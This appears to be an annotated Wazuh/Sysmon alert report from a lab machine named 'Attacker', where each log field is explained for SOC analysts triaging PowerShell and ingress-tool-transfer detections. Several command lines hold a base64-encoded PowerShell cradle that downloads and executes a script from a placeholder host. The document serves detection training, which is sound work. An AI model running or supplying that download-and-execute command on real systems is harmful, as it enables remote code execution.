data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:13.251 ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ProcessId: 11356 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ParentProcessId: 12064 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:13.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:17.573+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:17.573+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  89
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534357.1809814
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:14.8850196Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285208
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:14.876 ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ProcessId: 11356 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_npkr0h0g.e4e.ps1 CreationUtcTime: 2025-04-24 22:39:14.876 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:14.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_npkr0h0g.e4e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:14.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:20.198+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:20.198+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  86
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534360.1812583
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:18.2193741Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285229
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:16.709 ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ProcessId: 9520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} ParentProcessId: 11356 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:16.709
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd91-680a-9c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:21.028+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:21.028+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  90
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534361.1820650
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:18.4176699Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285234
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:18.402 ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ProcessId: 9520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2q2rgyzm.xew.ps1 CreationUtcTime: 2025-04-24 22:39:18.402 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:18.402
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2q2rgyzm.xew.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:18.402
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:25.573+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:25.573+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  87
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534365.1823415
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:22.8896094Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285277
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

